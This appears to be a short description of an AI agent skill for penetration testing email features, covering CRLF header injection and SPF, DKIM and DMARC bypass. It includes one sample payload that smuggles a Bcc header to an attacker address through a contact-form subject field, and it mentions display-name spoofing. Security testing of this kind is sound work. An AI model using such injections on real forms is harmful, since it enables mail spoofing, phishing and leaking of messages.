What problem does it solve? When penetration testing contact forms, password reset flows, or email APIs, testers often miss the distinction between SMTP header injection (CRLF-based) and email authentication bypass (SPF/DKIM/DMARC misconfiguration), leaving spoofing and exfiltration vectors unexplored. ## Core Features & Use Cases - CRLF Header Injection Playbook: Payloads and encoding variants (%0d%0a, double-encoding, LF-only, Unicode) for injecting Bcc, Reply-To, Content-Type, and full email bodies through user-controlled fields. - Email Authentication Bypass: Techniques for enumerating and exploiting SPF, DKIM, and DMARC weaknesses, plus display name spoofing that works even with strict policies. - Use Case: While testing a target's contact form, inject test%0d%0aBcc:attacker@evil.com into the subject field, confirm the extra header in the received email, then escalate to body injection and check dig TXT _dmarc.target.com for spoofing feasibility. ## Quick Start Ask the agent to test the target's contact form and password reset feature for email header injection and check the domain's SPF and DMARC records for spoofing weaknesses.